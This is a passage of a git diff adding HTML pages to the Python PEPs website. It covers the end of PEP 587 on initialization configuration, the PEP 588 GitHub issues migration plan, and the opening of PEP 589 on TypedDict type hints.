-X utf8=VALUE | utf8_mode = VALUE
+

Command line options mapped to pseudo-action on PyConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Option                       | PyConfig field
-b                           | bytes_warning++
-B                           | write_bytecode = 0
-c COMMAND                   | run_command = COMMAND
--check-hash-based-pycs=MODE | check_hash_pycs_mode = MODE
-d                           | parser_debug++
-E                           | use_environment = 0
-i                           | inspect++ and interactive++
-I                           | isolated = 1
-m MODULE                    | run_module = MODULE
-O                           | optimization_level++
-q                           | quiet++
-R                           | use_hash_seed = 0
-s                           | user_site_directory = 0
-S                           | site_import = 0
-t                           | ignored (kept for backwards compatibility)
-u                           | buffered_stdio = 0
-v                           | verbose++
-W WARNING                   | add WARNING to warnoptions
-x                           | skip_source_first_line = 1
-X OPTION                    | add OPTION to xoptions
+

The -h, -? and -V options are handled without PyConfig.

+
+
+

-X Options

+

-X options mapped to pseudo-action on PyConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Option                   | PyConfig field
-X dev                   | dev_mode = 1
-X faulthandler          | faulthandler = 1
-X importtime            | import_time = 1
-X pycache_prefix=PREFIX | pycache_prefix = PREFIX
-X showalloccount        | show_alloc_count = 1
-X showrefcount          | show_ref_count = 1
-X tracemalloc=N         | tracemalloc = N
+
+
+

Environment Variables

+

Environment variables mapped to PyPreConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + +
Variable                      | PyPreConfig field
PYTHONCOERCECLOCALE           | coerce_c_locale, coerce_c_locale_warn
PYTHONDEVMODE                 | dev_mode
PYTHONLEGACYWINDOWSFSENCODING | legacy_windows_fs_encoding
PYTHONMALLOC                  | allocator
PYTHONUTF8                    | utf8_mode
+

Environment variables mapped to PyConfig fields:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Variable                 | PyConfig field
PYTHONDEBUG              | parser_debug
PYTHONDEVMODE            | dev_mode
PYTHONDONTWRITEBYTECODE  | write_bytecode
PYTHONDUMPREFS           | dump_refs
PYTHONEXECUTABLE         | program_name
PYTHONFAULTHANDLER       | faulthandler
PYTHONHASHSEED           | use_hash_seed, hash_seed
PYTHONHOME               | home
PYTHONINSPECT            | inspect
PYTHONIOENCODING         | stdio_encoding, stdio_errors
PYTHONLEGACYWINDOWSSTDIO | legacy_windows_stdio
PYTHONMALLOCSTATS        | malloc_stats
PYTHONNOUSERSITE         | user_site_directory
PYTHONOPTIMIZE           | optimization_level
PYTHONPATH               | pythonpath_env
PYTHONPROFILEIMPORTTIME  | import_time
PYTHONPYCACHEPREFIX      | pycache_prefix
PYTHONTRACEMALLOC        | tracemalloc
PYTHONUNBUFFERED         | buffered_stdio
PYTHONVERBOSE            | verbose
PYTHONWARNINGS           | warnoptions
+

PYTHONLEGACYWINDOWSFSENCODING and PYTHONLEGACYWINDOWSSTDIO are +specific to Windows.

+
+
+

Default Python Configuration

+

PyPreConfig_InitPythonConfig():

+
    +
  • allocator = PYMEM_ALLOCATOR_NOT_SET
  • +
  • coerce_c_locale_warn = -1
  • +
  • coerce_c_locale = -1
  • +
  • configure_locale = 1
  • +
  • dev_mode = -1
  • +
  • isolated = 0
  • +
  • legacy_windows_fs_encoding = -1
  • +
  • use_environment = 1
  • +
  • utf8_mode = -1
  • +
+

PyConfig_InitPythonConfig():

+
    +
  • argv = []
  • +
  • base_exec_prefix = NULL
  • +
  • base_prefix = NULL
  • +
  • buffered_stdio = 1
  • +
  • bytes_warning = 0
  • +
  • check_hash_pycs_mode = NULL
  • +
  • configure_c_stdio = 1
  • +
  • dev_mode = 0
  • +
  • dump_refs = 0
  • +
  • exec_prefix = NULL
  • +
  • executable = NULL
  • +
  • faulthandler = 0
  • +
  • filesystem_encoding = NULL
  • +
  • filesystem_errors = NULL
  • +
  • hash_seed = 0
  • +
  • home = NULL
  • +
  • import_time = 0
  • +
  • inspect = 0
  • +
  • install_signal_handlers = 1
  • +
  • interactive = 0
  • +
  • isolated = 0
  • +
  • malloc_stats = 0
  • +
  • pythonpath_env = NULL
  • +
  • module_search_paths = []
  • +
  • optimization_level = 0
  • +
  • parse_argv = 1
  • +
  • parser_debug = 0
  • +
  • pathconfig_warnings = 1
  • +
  • prefix = NULL
  • +
  • program_name = NULL
  • +
  • pycache_prefix = NULL
  • +
  • quiet = 0
  • +
  • run_command = NULL
  • +
  • run_filename = NULL
  • +
  • run_module = NULL
  • +
  • show_alloc_count = 0
  • +
  • show_ref_count = 0
  • +
  • site_import = 1
  • +
  • skip_source_first_line = 0
  • +
  • stdio_encoding = NULL
  • +
  • stdio_errors = NULL
  • +
  • tracemalloc = 0
  • +
  • use_environment = 1
  • +
  • use_hash_seed = 0
  • +
  • user_site_directory = 1
  • +
  • verbose = 0
  • +
  • warnoptions = []
  • +
  • write_bytecode = 1
  • +
  • xoptions = []
  • +
  • _init_main = 1
  • +
  • _install_importlib = 1
  • +
+
+
+

Default Isolated Configuration

+

PyPreConfig_InitIsolatedConfig():

+
    +
  • allocator = PYMEM_ALLOCATOR_NOT_SET
  • +
  • coerce_c_locale_warn = 0
  • +
  • coerce_c_locale = 0
  • +
  • configure_locale = 0
  • +
  • dev_mode = 0
  • +
  • isolated = 1
  • +
  • legacy_windows_fs_encoding = 0
  • +
  • use_environment = 0
  • +
  • utf8_mode = 0
  • +
+

PyConfig_InitIsolatedConfig():

+
    +
  • argv = []
  • +
  • base_exec_prefix = NULL
  • +
  • base_prefix = NULL
  • +
  • buffered_stdio = 1
  • +
  • bytes_warning = 0
  • +
  • check_hash_pycs_mode = NULL
  • +
  • configure_c_stdio = 0
  • +
  • dev_mode = 0
  • +
  • dump_refs = 0
  • +
  • exec_prefix = NULL
  • +
  • executable = NULL
  • +
  • faulthandler = 0
  • +
  • filesystem_encoding = NULL
  • +
  • filesystem_errors = NULL
  • +
  • hash_seed = 0
  • +
  • home = NULL
  • +
  • import_time = 0
  • +
  • inspect = 0
  • +
  • install_signal_handlers = 0
  • +
  • interactive = 0
  • +
  • isolated = 1
  • +
  • malloc_stats = 0
  • +
  • pythonpath_env = NULL
  • +
  • module_search_paths = []
  • +
  • optimization_level = 0
  • +
  • parse_argv = 0
  • +
  • parser_debug = 0
  • +
  • pathconfig_warnings = 0
  • +
  • prefix = NULL
  • +
  • program_name = NULL
  • +
  • pycache_prefix = NULL
  • +
  • quiet = 0
  • +
  • run_command = NULL
  • +
  • run_filename = NULL
  • +
  • run_module = NULL
  • +
  • show_alloc_count = 0
  • +
  • show_ref_count = 0
  • +
  • site_import = 1
  • +
  • skip_source_first_line = 0
  • +
  • stdio_encoding = NULL
  • +
  • stdio_errors = NULL
  • +
  • tracemalloc = 0
  • +
  • use_environment = 0
  • +
  • use_hash_seed = 0
  • +
  • user_site_directory = 0
  • +
  • verbose = 0
  • +
  • warnoptions = []
  • +
  • write_bytecode = 1
  • +
  • xoptions = []
  • +
  • _init_main = 1
  • +
  • _install_importlib = 1
  • +
+
+
+

Python 3.7 API

+

Python 3.7 has 4 functions in its C API to initialize and finalize +Python:

+
    +
  • Py_Initialize(), Py_InitializeEx(): initialize Python
  • +
  • Py_Finalize(), Py_FinalizeEx(): finalize Python
  • +
+

Python 3.7 can be configured using Global Configuration Variables, +Environment Variables, and the following functions:

+
    +
  • PyImport_AppendInittab()
  • +
  • PyImport_ExtendInittab()
  • +
  • PyMem_SetAllocator()
  • +
  • PyMem_SetupDebugHooks()
  • +
  • PyObject_SetArenaAllocator()
  • +
  • Py_SetPath()
  • +
  • Py_SetProgramName()
  • +
  • Py_SetPythonHome()
  • +
  • Py_SetStandardStreamEncoding()
  • +
  • PySys_AddWarnOption()
  • +
  • PySys_AddXOption()
  • +
  • PySys_ResetWarnOptions()
  • +
+

There is also the high-level Py_Main() function and the PyImport_FrozenModules variable which can be overridden.

+

See Initialization, Finalization, and Threads documentation.

+
+
+
+

Python Issues

+

Issues that will be fixed by this PEP, directly or indirectly:

+
    +
  • bpo-1195571: “simple +callback system for Py_FatalError”
  • +
  • bpo-11320: +“Usage of API method Py_SetPath causes errors in Py_Initialize() +(Posix only)”
  • +
  • bpo-13533: “Would like +Py_Initialize to play friendly with host app”
  • +
  • bpo-14956: “custom PYTHONPATH +may break apps embedding Python”
  • +
  • bpo-19983: “When interrupted +during startup, Python should not call abort() but exit()”
  • +
  • bpo-22213: “Make pyvenv style +virtual environments easier to configure when embedding Python”.
  • +
  • bpo-29778: “_Py_CheckPython3 +uses uninitialized dllpath when embedder sets module path with +Py_SetPath”
  • +
  • bpo-30560: “Add +Py_SetFatalErrorAbortFunc: Allow embedding program to handle fatal +errors”.
  • +
  • bpo-31745: “Overloading +“Py_GetPath” does not work”
  • +
  • bpo-32573: “All sys attributes +(.argv, …) should exist in embedded environments”.
  • +
  • bpo-33135: "Define field prefixes for the various config structs". The PEP now defines clearly how warnings options are handled.
  • +
  • bpo-34725: +“Py_GetProgramFullPath() odd behaviour in Windows”
  • +
  • bpo-36204: “Deprecate calling +Py_Main() after Py_Initialize()? Add Py_InitializeFromArgv()?”
  • +
+

Issues of the PEP implementation:

+
    +
  • bpo-16961: “No regression +tests for -E and individual environment vars”
  • +
  • bpo-20361: “-W command line +options and PYTHONWARNINGS environmental variable should not override +-b / -bb command line options”
  • +
  • bpo-26122: “Isolated mode +doesn’t ignore PYTHONHASHSEED”
  • +
  • bpo-29818: +“Py_SetStandardStreamEncoding leads to a memory error in debug mode”
  • +
  • bpo-31845: +“PYTHONDONTWRITEBYTECODE and PYTHONOPTIMIZE have no effect”
  • +
  • bpo-32030: “PEP 432: Rewrite +Py_Main()”
  • +
  • bpo-32124: “Document functions +safe to be called before Py_Initialize()”
  • +
  • bpo-33042: “New 3.7 startup +sequence crashes PyInstaller”
  • +
  • bpo-33932: “Calling +Py_Initialize() twice now triggers a fatal error (Python 3.7)”
  • +
  • bpo-34008: “Do we support +calling Py_Main() after Py_Initialize()?”
  • +
  • bpo-34170: “Py_Initialize(): +computing path configuration must not have side effect (PEP 432)”
  • +
  • bpo-34589: “Py_Initialize() +and Py_Main() should not enable C locale coercion”
  • +
  • bpo-34639: +“PYTHONCOERCECLOCALE is ignored when using -E or -I option”
  • +
  • bpo-36142: “Add a new +_PyPreConfig step to Python initialization to setup memory allocator +and encodings”
  • +
  • bpo-36202: “Calling +Py_DecodeLocale() before _PyPreConfig_Write() can produce mojibake”
  • +
  • bpo-36301: “Add +_Py_PreInitialize() function”
  • +
  • bpo-36443: “Disable +coerce_c_locale and utf8_mode by default in _PyPreConfig?”
  • +
  • bpo-36444: “Python +initialization: remove _PyMainInterpreterConfig”
  • +
  • bpo-36471: “PEP 432, PEP 587: +Add _Py_RunMain()”
  • +
  • bpo-36763: “PEP 587: Rework +initialization API to prepare second version of the PEP”
  • +
  • bpo-36775: “Rework filesystem +codec implementation”
  • +
  • bpo-36900: “Use _PyCoreConfig +rather than global configuration variables”
  • +
+

Issues related to this PEP:

+
    +
  • bpo-12598: “Move sys variable +initialization from import.c to sysmodule.c”
  • +
  • bpo-15577: “Real argc and argv +in embedded interpreter”
  • +
  • bpo-16202: “sys.path[0] +security issues”
  • +
  • bpo-18309: “Make python +slightly more relocatable”
  • +
  • bpo-22257: “PEP 432: Redesign +the interpreter startup sequence”
  • +
  • bpo-25631: “Segmentation fault +with invalid Unicode command-line arguments in embedded Python”
  • +
  • bpo-26007: “Support embedding +the standard library in an executable”
  • +
  • bpo-31210: “Can not import +modules if sys.prefix contains DELIM”.
  • +
  • bpo-31349: “Embedded +initialization ignores Py_SetProgramName()”
  • +
  • bpo-33919: “Expose +_PyCoreConfig structure to Python”
  • +
  • bpo-35173: “Re-use already +existing functionality to allow Python 2.7.x (both embedded and +standalone) to locate the module path according to the shared library”
  • +
+
+
+

Discussions

+ +
+
+

Version History

+
    +
  • Version 5:
      +
    • Rename PyInitError to PyStatus
    • +
    • Rename PyInitError_Failed() to PyStatus_Exception()
    • +
    • Rename Py_ExitInitError() to Py_ExitStatusException()
    • +
    • Add PyPreConfig._config_init private field.
    • +
    • Fix Python Configuration default values: isolated=0 +and use_environment=1, instead of -1.
    • +
    • Add “Multi-Phase Initialization Private Provisional API” +and “Discussions” sections
    • +
    +
  • +
  • Version 4:
      +
    • Introduce "Python Configuration" and "Isolated Configuration" which are much better defined. Replace all macros with functions.
    • +
    • Replace PyPreConfig_INIT and PyConfig_INIT macros with +functions:
        +
      • PyPreConfig_InitIsolatedConfig(), PyConfig_InitIsolatedConfig()
      • +
      • PyPreConfig_InitPythonConfig(), PyConfig_InitPythonConfig()
      • +
      +
    • +
    • PyPreConfig no longer uses dynamic memory, the allocator field type becomes an int, and add configure_locale and parse_argv fields.
    • +
    • PyConfig: rename module_search_path_env to +pythonpath_env, rename use_module_search_paths to +module_search_paths_set, remove program and dll_path.
    • +
    • Replace Py_INIT_xxx() macros with PyInitError_xxx() +functions.
    • +
    • Remove the “Constant PyConfig” section. Remove +Py_InitializeFromArgs() and Py_InitializeFromBytesArgs() +functions.
    • +
    +
  • +
  • Version 3:
      +
    • PyConfig: Add configure_c_stdio and parse_argv; +rename _frozen to pathconfig_warnings.
    • +
    • Rename functions using bytes strings and wide character strings. For +example, Py_PreInitializeFromWideArgs() becomes +Py_PreInitializeFromArgs(), and PyConfig_SetArgv() becomes +PyConfig_SetBytesArgv().
    • +
    • Add PyWideStringList_Insert() function.
    • +
    • New “Path configuration”, “Isolate Python”, “Python Issues” +and “Version History” sections.
    • +
    • PyConfig_SetString() and PyConfig_SetBytesString() now require the configuration as the first argument.
    • +
    • Rename Py_UnixMain() to Py_BytesMain()
    • +
    +
  • +
  • Version 2: Add PyConfig methods (ex: PyConfig_Read()), add +PyWideStringList_Append(), rename PyWideCharList to +PyWideStringList.
  • +
  • Version 1: Initial version.
  • +
+
+
+

Acceptance

+

PEP 587 was accepted by Thomas Wouters on May 26, 2019.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0587.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0588/index.html b/pep-0588/index.html new file mode 100644 index 00000000000..6a7c584b512 --- /dev/null +++ b/pep-0588/index.html @@ -0,0 +1,428 @@ + + + + + + + + PEP 588 – GitHub Issues Migration Plan | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 588 – GitHub Issues Migration Plan

+
+
Author:
+
Mariatta <mariatta at python.org>
+
BDFL-Delegate:
+
Barry Warsaw <barry at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
27-Mar-2019
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at psf/gh-migration#13.

+


+

The migration was carried out in April 2022.

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP describes the detailed plan for migrating from Python’s issue +tracker on Roundup to GitHub issues. See PEP 581 for rationale and +background. PEP 588 also describes the detailed timeline for the +migration.

+
+
+

Migration Plan

+

Here we outline the tasks, steps, and core decisions we need to make +in order to migrate bug tracking to GitHub, with the least impact on +CPython developer productivity.

+
+

Hire a professional project manager

+

Having a professional project manager to handle the migration, similar to how +the Warehouse project was managed, would help ensure the success of this project.

+
+
+

Create a playground CPython issue tracker on GitHub

+

We should create a playground issue tracker on GitHub where we can experiment +and test out the new workflow.

+
+
+

Backup of GitHub data

+

This effort has been started and is being tracked as an issue in core-workflow [1]. We're using GitHub's Migrations API [2] to download GitHub data for CPython on a daily basis. The archives will be dropped in an S3 bucket.

+

Thanks to Ee Durbin for working on this.

+
+
+

Update the CLA host

+

At the moment, the CLA is hosted within bpo. It needs to be updated such that signing the CLA does not require a bpo account, and it should be hosted outside of bpo.

+

The current CLA process itself is not ideal. Currently, contributors to +devguide, peps, and core-workflow need to sign a CLA, and it requires a bpo +account. A bpo account should not be required for those projects.

+

There is an ongoing effort to start using our own instance of CLA +assistant instead of the current CLA process in place. Discussion +about this has been started in core-workflow mailing list +as well as on Discourse.

+

This effort is currently stalled because cla-assistant does not yet support CLAs signed on behalf of an organization.

+
+
+

Create “Python Triage” team on GitHub

+

The bug triagers on bpo are valuable to the core Python workflow, and we +definitely would need even more help with triaging issues on GitHub.

+

It has been proposed on Discourse +for us to create a “bug triage” team on GitHub to help with closing +issues, notifying the appropriate parties, as well as applying labels +to issues and pull requests.

+

The new Triage role on GitHub is currently in beta, and the Python organization +has been granted access to this role, and we can begin taking advantage of it.

+

The “Python Triage” team has been created. A description and expectations of the +triage role have been added to Devguide.

+

Progress of this project can be +tracked in “Adding Triagers” project board.

+
+
+

Create labels for issue triage

+

In bpo, we currently have the following fields for each issue:

+

Types: behavior, crash, compile error, resource +usage, security, performance, enhancement.

+

Components: 2to3, Argument Clinic, asyncio, Build, +Cross-build, ctypes, …

+

Priority: release blocker, deferred blocker, critical, +high, normal, low

+

We will create the corresponding labels:

+
type-behavior, type-crash, type-compile error, type-resource usage, ...
+
+components-2to3, components-argument clinic, components-asyncio, ...
+
+priority-release blocker, priority-deferred blocker, priority-critical, ...
+
+
+

In addition, we’ll create a needs triage label.

+

The final “labels” to be created can be decided at a later time when +it is time to start switching to GitHub issues.

+

A test repository containing all possible labels and color schema has been +created by Carol Willing and can be reviewed at https://github.com/willingc/test-581/labels.

+
+
+

Create issue templates

+

We will create an issue template and add the following headers:

+
---
+Type: behavior | crash | compile error | resource usage (choose one)
+Components: 2to3 | Argument Clinic | asyncio | Build | ... (can select more than one)
+Priority: release blocker | deferred blocker | critical | ...
+Needs backport to: 2.7 | 3.6 | 3.7
+---
+
+
+

The idea is to allow the issue creator to help us triage the issue. The above values are pre-filled in the template. The issue creator will remove the text that does not apply to their issue.

+

Based on the above headers, bedevere-bot can apply the necessary +labels to the issue. If the issue creator did not supply the above +headers, the bot will apply the needs triage label. At that point, +it will require a core developer to properly label the issue.

+

We can also take advantage of GitHub’s multiple issue template +feature, and the ability to automatically set issue assignee and +labels by using issue templates.

+
+
+

Updates to bedevere

+

Bedevere-bot will need to be updated to recognize the issue headers described +above and apply the proper labels.

+

Bedevere-bot can also copy over the labels to pull requests that correspond to +the issue.

+
+
+

Update the devguide

+

Devguide should be updated with information about the new workflow of using GitHub +issues. It can be done as a separate branch, and it should be done ahead of the +migration, not after.

+
+
+

Add a button in bpo to migrate the issue to GitHub

+

This will require bpo to be updated. But I believe the effort needed for this is much less than a complete overhaul.

+

We will create a button in bpo, that will copy over the issue description +and associated comments into a GitHub issue.

+

We need to add a new status, "moved", with the URL of the GitHub issue.

+

We should not be moving all open issues to GitHub. An issue should only be "moved" to GitHub when someone is interested in continuing work or discussion on it.

+
+
+

Migrated issues

+

When an issue is marked as "moved", it should be in read-only mode. bpo should forbid further editing of the issue.

+
+
+

Make bpo read-only

+

This should be the final step. Once we start using GitHub issues, make bpo +read-only, instead of shutting it down. +Do not accept new registrations. Do not allow comments or issues to be created.

+
+
+

Mapping between issues from bpo and GitHub

+

Usually when we reference an issue from bpo, we use bpo-XYZ but with +GitHub, we will have a new reference with this format +https://github.com/python/cpython/issue/XYZ.

+

Because we will migrate the issues from bpo to GitHub, we need to have a new +field on bpo for the reference to the issues on GitHub, and the same thing on +GitHub for the ‘eventual’ reference from bpo.

+

For GitHub, we need to add origin: https://bugs.python.org/issueXYZ. +For bpo, add a new field moved to: +https://github.com/python/cpython/issue/XYZ.

+
+
+

Nosy-ing the expert

+

A current functionality in bpo is to automatically nosy people who are listed as experts in a certain area. Several Python core developers have expressed that they prefer not having to subscribe to everything on GitHub, but only getting notified for issues related to their area of interest and expertise.

+

To help with this situation, we can develop a bot that can notify people whenever an issue has been categorized using labels. For example, when an issue is labeled with area-windows, the Windows experts can be notified. The notification can be in the form of an email notification, or an @-mention on GitHub.

+
+
+
+

Open issues

+
+

A GitHub account should not be a requirement

+

Back when moving the CPython codebase from Mercurial to GitHub was +being discussed [3] [4], it was brought up that we still needed to +allow uploading of patches on bpo, and that a GitHub account should +not be a requirement in order to contribute to Python.

+

If bpo is made read-only, we’ll need to come up with a different solution to +allow people to contribute when they don’t have a GitHub account.

+

One solution is to create a new “python-issues” mailing list, similar to the +docs@python.org [5] mailing list, to allow people to submit their issues +there.

+

Related to this, since the migration to GitHub in 2017, I recall one +case [6] where there was a contributor, who submitted a patch to +Mercurial and refused to create a GitHub account. Because of this, our +bot was unable to detect whether they had signed the CLA. Another +person had volunteered to upload their patch to GitHub. But it was +still required that both people sign the CLA.

+

That particular situation was complicated. It took up five core +developers’ time to investigate and manually check the CLA, causing +confusion.

+
+
+

Trim off the “Components” list

+

Does the current "components" list still make sense, and is it still relevant? Can the list be shortened?

+
+
+

Priority list

+

Is the current “priority” list useful? Alyssa Coghlan noted that perhaps only +release blocker and deferred blocker are useful.

+
+
+
+

Further questions and discussions

+

You can post questions on Discourse under the +Core-Workflow category.

+
+
+

Acknowledgements

+

Thanks to Guido van Rossum, Brett Cannon, and Alyssa Coghlan, who were consulted +in the early stage and research of this PEP. Their feedback, concerns, input, +and ideas have been valuable.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0588.rst

+

Last modified: 2024-10-28 18:53:21 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0589/index.html b/pep-0589/index.html new file mode 100644 index 00000000000..717f3394f5a --- /dev/null +++ b/pep-0589/index.html @@ -0,0 +1,813 @@ + + + + + + + + PEP 589 – TypedDict: Type Hints for Dictionaries with a Fixed Set of Keys | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 589 – TypedDict: Type Hints for Dictionaries with a Fixed Set of Keys

+
+
Author:
+
Jukka Lehtosalo <jukka.lehtosalo at iki.fi>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
20-Mar-2019
+
Python-Version:
+
3.8
+
Post-History:
+

+
Resolution:
+
Typing-SIG message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see TypedDict and +typing.TypedDict for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

PEP 484 defines the type Dict[K, V] for uniform +dictionaries, where each value has the same type, and arbitrary key +values are supported. It doesn’t properly support the common pattern +where the type of a dictionary value depends on the string value of +the key. This PEP proposes a type constructor typing.TypedDict to +support the use case where a dictionary object has a specific set of +string keys, each with a value of a specific type.

+

Here is an example where PEP 484 doesn’t allow us to annotate +satisfactorily:

+
movie = {'name': 'Blade Runner',
+         'year': 1982}
+
+
+

This PEP proposes the addition of a new type constructor, called +TypedDict, to allow the type of movie to be represented +precisely:

+
from typing import TypedDict
+
+class Movie(TypedDict):
+    name: str
+    year: int
+
+
+

Now a type checker should accept this code:

+
movie: Movie = {'name': 'Blade Runner',
+                'year': 1982}
+
+
+
+
+

Motivation

+

Representing an object or structured data using (potentially nested) +dictionaries with string keys (instead of a user-defined class) is a +common pattern in Python programs. Representing JSON objects is +perhaps the canonical use case, and this is popular enough that Python +ships with a JSON library. This PEP proposes a way to allow such code +to be type checked more effectively.

+

More generally, representing pure data objects using only Python +primitive types such as dictionaries, strings and lists has a certain +appeal. They are easy to serialize and deserialize even +when not using JSON. They trivially support various useful operations +with no extra effort, including pretty-printing (through str() and +the pprint module), iteration, and equality comparisons.

+

PEP 484 doesn’t properly support the use cases mentioned above. Let’s +consider a dictionary object that has exactly two valid string keys, +'name' with value type str, and 'year' with value type +int. The PEP 484 type Dict[str, Any] would be suitable, but +it is too lenient, as arbitrary string keys can be used, and arbitrary +values are valid. Similarly, Dict[str, Union[str, int]] is too +general, as the value for key 'name' could be an int, and +arbitrary string keys are allowed. Also, the type of a subscription +expression such as d['name'] (assuming d to be a dictionary of +this type) would be Union[str, int], which is too wide.
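 
+
 
For example, the imprecision can be seen directly (a sketch of the limitation described above):
 
+
from typing import Dict, Union
+
+movie: Dict[str, Union[str, int]] = {'name': 'Blade Runner', 'year': 1982}
+movie['name'] = 1982   # Accepted by a checker, though 'name' should be a str
+name = movie['name']   # Static type is Union[str, int]: too wide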

+

Dataclasses are a more recent alternative to solve this use case, but +there is still a lot of existing code that was written before +dataclasses became available, especially in large existing codebases +where type hinting and checking has proven to be helpful. Unlike +dictionary objects, dataclasses don’t directly support JSON +serialization, though there is a third-party package that implements +it [1].

+
+
+

Specification

+

A TypedDict type represents dictionary objects with a specific set of +string keys, and with specific value types for each valid key. Each +string key can be either required (it must be present) or +non-required (it doesn’t need to exist).

+

This PEP proposes two ways of defining TypedDict types. The first uses +a class-based syntax. The second is an alternative +assignment-based syntax that is provided for backwards compatibility, +to allow the feature to be backported to older Python versions. The +rationale is similar to why PEP 484 supports a comment-based +annotation syntax for Python 2.7: type hinting is particularly useful +for large existing codebases, and these often need to run on older +Python versions. The two syntax options parallel the syntax variants +supported by typing.NamedTuple. Other proposed features include +TypedDict inheritance and totality (specifying whether keys are +required or not).

+

This PEP also provides a sketch of how a type checker is expected +to support type checking operations involving TypedDict objects. +Similar to PEP 484, this discussion is left somewhat vague on purpose, +to allow experimentation with a wide variety of different type +checking approaches. In particular, type compatibility should be +based on structural compatibility: a more specific TypedDict type can +be compatible with a smaller (more general) TypedDict type.

+
+

Class-based Syntax

+

A TypedDict type can be defined using the class definition syntax with +typing.TypedDict as the sole base class:

+
from typing import TypedDict
+
+class Movie(TypedDict):
+    name: str
+    year: int
+
+
+

Movie is a TypedDict type with two items: 'name' (with type +str) and 'year' (with type int).

+

A type checker should validate that the body of a class-based +TypedDict definition conforms to the following rules:

+
    +
  • The class body should only contain lines with item definitions of the +form key: value_type, optionally preceded by a docstring. The +syntax for item definitions is identical to attribute annotations, +but there must be no initializer, and the key name actually refers +to the string value of the key instead of an attribute name.
  • +
  • Type comments cannot be used with the class-based syntax, for +consistency with the class-based NamedTuple syntax. (Note that +it would not be sufficient to support type comments for backwards +compatibility with Python 2.7, since the class definition may have a +total keyword argument, as discussed below, and this isn’t valid +syntax in Python 2.7.) Instead, this PEP provides an alternative, +assignment-based syntax for backwards compatibility, discussed in +Alternative Syntax.
  • +
  • String literal forward references are valid in the value types (see +the sketch after this list).
  • +
  • Methods are not allowed, since the runtime type of a TypedDict +object will always be just dict (it is never a subclass of +dict).
  • +
  • Specifying a metaclass is not allowed.
  • +
+
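 
As referenced in the list above, a string literal forward reference allows a value type that is only defined later in the module (a sketch; Film and Person are hypothetical names):
 
+
class Film(TypedDict):
+    name: str
+    director: 'Person'  # string literal forward reference, resolved below
+
+class Person(TypedDict):
+    name: str
+
+
+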

An empty TypedDict can be created by only including pass in the +body (if there is a docstring, pass can be omitted):

+
class EmptyDict(TypedDict):
+    pass
+
+
+
+
+

Using TypedDict Types

+

Here is an example of how the type Movie can be used:

+
movie: Movie = {'name': 'Blade Runner',
+                'year': 1982}
+
+
+

An explicit Movie type annotation is generally needed, as +otherwise an ordinary dictionary type could be assumed by a type +checker, for backwards compatibility. When a type checker can infer +that a constructed dictionary object should be a TypedDict, an +explicit annotation can be omitted. A typical example is a dictionary +object as a function argument. In this example, a type checker is +expected to infer that the dictionary argument should be understood as +a TypedDict:

+
def record_movie(movie: Movie) -> None: ...
+
+record_movie({'name': 'Blade Runner', 'year': 1982})
+
+
+

Another example where a type checker should treat a dictionary display +as a TypedDict is in an assignment to a variable with a previously +declared TypedDict type:

+
movie: Movie
+...
+movie = {'name': 'Blade Runner', 'year': 1982}
+
+
+

Operations on movie can be checked by a static type checker:

+
movie['director'] = 'Ridley Scott'  # Error: invalid key 'director'
+movie['year'] = '1982'  # Error: invalid value type ("int" expected)
+
+
+

The code below should be rejected, since 'title' is not a valid +key, and the 'name' key is missing:

+
movie2: Movie = {'title': 'Blade Runner',
+                 'year': 1982}
+
+
+

The created TypedDict type object is not a real class object. Here +are the only uses of the type a type checker is expected to allow:

+
    +
  • It can be used in type annotations and in any context where an +arbitrary type hint is valid, such as in type aliases and as the +target type of a cast.
  • +
  • It can be used as a callable object with keyword arguments +corresponding to the TypedDict items. Non-keyword arguments are not +allowed. Example:
    m = Movie(name='Blade Runner', year=1982)
    +
    +
    +

    When called, the TypedDict type object returns an ordinary +dictionary object at runtime:

    +
    print(type(m))  # <class 'dict'>
    +
    +
    +
  • +
  • It can be used as a base class, but only when defining a derived +TypedDict. This is discussed in more detail below.
  • +
+

In particular, TypedDict type objects cannot be used in +isinstance() tests such as isinstance(d, Movie). The reason is +that there is no existing support for checking types of dictionary +item values, since isinstance() does not work with many PEP 484 +types, including common ones like List[str]. This would be needed +for cases like this:

+
class Strings(TypedDict):
+    items: List[str]
+
+print(isinstance({'items': [1]}, Strings))    # Should be False
+print(isinstance({'items': ['x']}, Strings))  # Should be True
+
+
+

The above use case is not supported. This is consistent with how +isinstance() is not supported for List[str].

+
+
+

Inheritance

+

It is possible for a TypedDict type to inherit from one or more +TypedDict types using the class-based syntax. In this case the +TypedDict base class should not be included. Example:

+
class BookBasedMovie(Movie):
+    based_on: str
+
+
+

Now BookBasedMovie has keys name, year, and based_on. +It is equivalent to this definition, since TypedDict types use +structural compatibility:

+
